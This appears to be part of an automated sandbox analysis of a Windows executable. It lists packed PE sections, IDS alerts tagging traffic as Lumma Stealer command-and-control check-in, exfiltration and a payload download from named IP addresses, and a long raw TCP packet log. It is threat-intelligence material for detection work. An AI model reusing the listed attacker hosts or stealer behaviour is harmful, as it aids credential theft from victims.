                                                                                                                                                                                                0x10000x550000x25e0017cadbff6a9cc601b25ff62e457cfde3False0.9974345090759076data7.979806928736388IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .rsrc 0x560000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .idata 0x570000x10000x200b32b7c4ad821f82288405a0d11e75f2fFalse0.15625data1.1076713340399604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                0x580000x2a80000x200e8d400c18b4e55bc47a4cff98453cf8funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                hcvjgapr0x3000000x19d0000x19c400f03359685f9a50ac38706577471a32f8False0.9946209113477865data7.954111183575333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                xbrvldyi0x49d0000x10000x400e4329b1f7169e51d97096875284cc8c8False0.7734375data6.003964977513262IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .taggant0x49e0000x30000x2200115568b7999d6981e5aaa94dba4fb2edFalse0.07996323529411764DOS executable (COM)1.0454989436551618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                kernel32.dlllstrcpy
                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                2024-11-20T10:54:20.492456+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749719188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:20.934369+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749719188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:20.934369+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749719188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:21.466636+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749725188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:21.872415+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749725188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:21.872415+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749725188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:22.871245+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749736188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:23.630000+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749736188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:24.290685+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749747188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:26.082894+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749758188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:27.704193+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749769188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:28.913916+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749780188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:32.877688+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749806188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:33.150067+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749806188.114.96.3443TCP
                                                                                                                                                                                                2024-11-20T10:54:33.875455+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.749812185.215.113.1680TCP
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 20, 2024 10:54:12.797684908 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                Nov 20, 2024 10:54:15.453845978 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                Nov 20, 2024 10:54:15.454061031 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                Nov 20, 2024 10:54:15.594512939 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                Nov 20, 2024 10:54:15.782331944 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                Nov 20, 2024 10:54:16.670794010 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:16.670819044 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:16.670895100 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:16.671583891 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:16.671597004 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.316204071 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.316329956 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.319679976 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.319689035 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.320148945 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.375701904 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.499414921 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.547337055 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.601027966 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.601054907 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.601063013 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.601089001 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.601103067 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.601114035 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.601118088 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.601138115 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.601165056 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.601207018 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.684909105 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.684932947 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.684983969 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.684999943 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.685034037 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.685055017 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.686599970 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.686621904 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.686650991 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.686706066 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.686711073 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.686774015 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.770946980 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.770967960 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.771020889 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.771035910 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.771064997 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.771085024 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.772450924 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.772473097 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.772511005 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.772517920 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.772566080 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.774175882 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.774198055 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.774241924 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.774249077 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.774276972 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.774296999 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.775752068 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.775772095 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.775810003 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.775815964 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.775850058 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.775890112 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858262062 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858282089 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858328104 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858346939 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858381987 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858398914 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858558893 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858587980 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858639956 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858647108 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858686924 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.858977079 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.859035969 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.859911919 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.859987020 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860260010 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860311985 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860332012 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860340118 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860387087 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860565901 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860608101 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860625982 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860635042 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860673904 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860692978 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860908985 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860949993 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860985041 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.860991001 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.861027002 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.861046076 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.861093998 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.861148119 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.861154079 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.861213923 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.861248970 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.861316919 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.863215923 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.863229036 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.863239050 CET49703443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.863243103 CET4434970313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.921154022 CET49704443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.921186924 CET4434970413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.921247005 CET49704443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.922739983 CET49705443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.922770977 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.922830105 CET49705443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.923696041 CET49706443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.923707008 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.923760891 CET49706443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.924516916 CET49707443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.924526930 CET4434970713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.924588919 CET49707443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.924923897 CET49704443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.924938917 CET4434970413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.925544024 CET49708443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.925590038 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.925648928 CET49708443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.925688982 CET49705443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.925702095 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.925762892 CET49708443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.925779104 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.925997972 CET49706443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.926011086 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:17.926280022 CET49707443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:17.926295042 CET4434970713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.569647074 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.570095062 CET49708443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.570108891 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.570574045 CET49708443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.570580006 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.570923090 CET4434970413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.571248055 CET49704443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.571260929 CET4434970413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.571641922 CET49704443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.571650028 CET4434970413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.578948975 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.579263926 CET49705443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.579288006 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.579626083 CET49705443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.579632044 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.580847025 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.581101894 CET49706443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.581118107 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.581459045 CET49706443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.581465960 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.591689110 CET4434970713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.592071056 CET49707443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.592086077 CET4434970713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.592470884 CET49707443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.592475891 CET4434970713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.673603058 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.673630953 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.673715115 CET49708443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.673729897 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.673744917 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.673795938 CET49708443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.673964977 CET49708443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.673979998 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.673994064 CET49708443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.674001932 CET4434970813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.675107956 CET4434970413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.675165892 CET4434970413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.675213099 CET49704443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.675591946 CET49704443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.675597906 CET4434970413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.675611973 CET49704443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.675616980 CET4434970413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.677517891 CET49709443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.677541018 CET4434970913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.677601099 CET49709443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.677972078 CET49709443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.677985907 CET4434970913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.678949118 CET49710443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.678966045 CET4434971013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.679016113 CET49710443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.679137945 CET49710443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.679148912 CET4434971013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.681911945 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.681967020 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.682023048 CET49705443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.682034016 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.682075977 CET49705443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.682111979 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.682179928 CET49705443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.682188988 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.682199955 CET49705443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.682219982 CET4434970513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.684154034 CET49711443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.684175968 CET4434971113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.684242010 CET49711443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.684329033 CET49711443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.684340000 CET4434971113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685306072 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685381889 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685436010 CET49706443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685445070 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685486078 CET49706443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685508966 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685527086 CET49706443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685548067 CET49706443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685555935 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685565948 CET49706443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685566902 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.685581923 CET4434970613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.687297106 CET49712443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.687320948 CET4434971213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.687381983 CET49712443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.687494040 CET49712443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.687505960 CET4434971213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.702342987 CET4434970713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.702403069 CET4434970713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.702450991 CET49707443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.702579975 CET49707443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.702589035 CET4434970713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.702601910 CET49707443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.702605963 CET4434970713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.705214977 CET49713443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.705229998 CET4434971313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:18.705302000 CET49713443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.705491066 CET49713443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:18.705504894 CET4434971313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.343067884 CET4434970913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.345715046 CET4434971313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.349169970 CET4434971213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.360517025 CET4434971113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.378283024 CET4434971013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.391308069 CET49709443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.391330004 CET49713443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.391336918 CET49712443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.407016039 CET49711443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.422569036 CET49710443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.460136890 CET49710443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.460149050 CET4434971013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.460845947 CET49710443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.460850954 CET4434971013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.461287975 CET49709443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.461293936 CET4434970913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.461863995 CET49709443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.461869001 CET4434970913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.462344885 CET49713443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.462349892 CET4434971313.107.246.45192.168.2.7
